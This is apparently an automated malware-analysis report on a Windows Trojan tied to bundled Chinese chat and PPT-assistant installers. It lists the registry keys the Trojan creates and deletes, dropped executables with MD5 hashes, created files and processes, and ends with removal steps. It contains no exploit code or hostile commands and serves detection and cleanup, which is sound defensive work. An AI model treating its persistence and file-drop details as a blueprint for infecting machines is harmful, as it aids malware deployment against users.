"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
The process regsvr32.exe:1124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 47 31 82 39 D8 42 05 2E CC 33 5C 83 E4 5B 5E"
The process regsvr32.exe:2940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 39 52 96 CA 39 CA 61 B4 82 1A AA 2E 61 00 CF"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
The process 9158.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 30 4F 3C 5C 6B D3 D9 BF 8C B0 B5 F6 48 2F B4"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Control]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\Programmable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Programmable]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Insertable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\Programmable]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
Dropped PE files
MD5 | File path |
---|---|
23b3afde34b252b53e7c1b4a78cb9712 | c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 |
ef8154cf33a6ac0dffc02f325acfb7de | c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\dts.exe |
91aeea640a17ed03dcfcde1b9096a86f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\uninst.exe |
50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\Inetc.dll |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\NSISdl.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\System.dll |
05450face243b3a7472407b999b03a72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\nsProcess.dll |
7b21f6e266e8a4188871804c9810d74a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe |
d7a6bde253e3b614afc203d9ff406855 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe |
23b3afde34b252b53e7c1b4a78cb9712 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe |
7b21f6e266e8a4188871804c9810d74a | c:\Program Files\MM-liao8398.exe |
d7a6bde253e3b614afc203d9ff406855 | c:\Program Files\yx_dts.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\´óÌìʹ֮½£.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\´óÌìʹ֮½£.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\öÃâ€ÃƒËœÃ‚´Ã³ÃŒÃ¬ÃŠÂ¹Ã–®½£.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\´óÌìʹ֮½£.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\å¸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
